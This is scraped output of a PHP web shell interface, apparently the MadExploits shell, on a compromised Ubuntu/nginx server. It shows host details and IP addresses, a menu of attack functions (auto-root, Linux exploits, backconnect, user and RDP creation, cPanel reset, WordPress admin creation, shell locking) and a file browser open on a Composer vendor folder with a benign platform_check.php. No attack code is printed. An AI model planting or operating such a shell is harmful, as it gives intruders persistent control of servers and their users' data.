Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
honeycomb /
src /
vendor-old /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
ClassLoader.php
15.99
KB
-rwxrwxr-x
InstalledVersions.php
15.76
KB
-rwxrwxr-x
LICENSE
1.04
KB
-rwxrwxr-x
autoload_classmap.php
624.33
KB
-rwxrwxr-x
autoload_files.php
2.99
KB
-rwxrwxr-x
autoload_namespaces.php
139
B
-rwxrwxr-x
autoload_psr4.php
6.7
KB
-rwxrwxr-x
autoload_real.php
1.63
KB
-rwxrwxr-x
autoload_static.php
687.35
KB
-rwxrwxr-x
installed.json
300.31
KB
-rwxrwxr-x
installed.php
48.74
KB
-rwxrwxr-x
platform_check.php
925
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : platform_check.php
<?php // platform_check.php @generated by Composer $issues = array(); if (!(PHP_VERSION_ID >= 80200)) { $issues[] = 'Your Composer dependencies require a PHP version ">= 8.2.0". You are running ' . PHP_VERSION . '.'; } if ($issues) { if (!headers_sent()) { header('HTTP/1.1 500 Internal Server Error'); } if (!ini_get('display_errors')) { if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') { fwrite(STDERR, 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . implode(PHP_EOL, $issues) . PHP_EOL.PHP_EOL); } elseif (!headers_sent()) { echo 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . str_replace('You are running '.PHP_VERSION.'.', '', implode(PHP_EOL, $issues)) . PHP_EOL.PHP_EOL; } } trigger_error( 'Composer detected issues in your platform: ' . implode(' ', $issues), E_USER_ERROR ); }
Close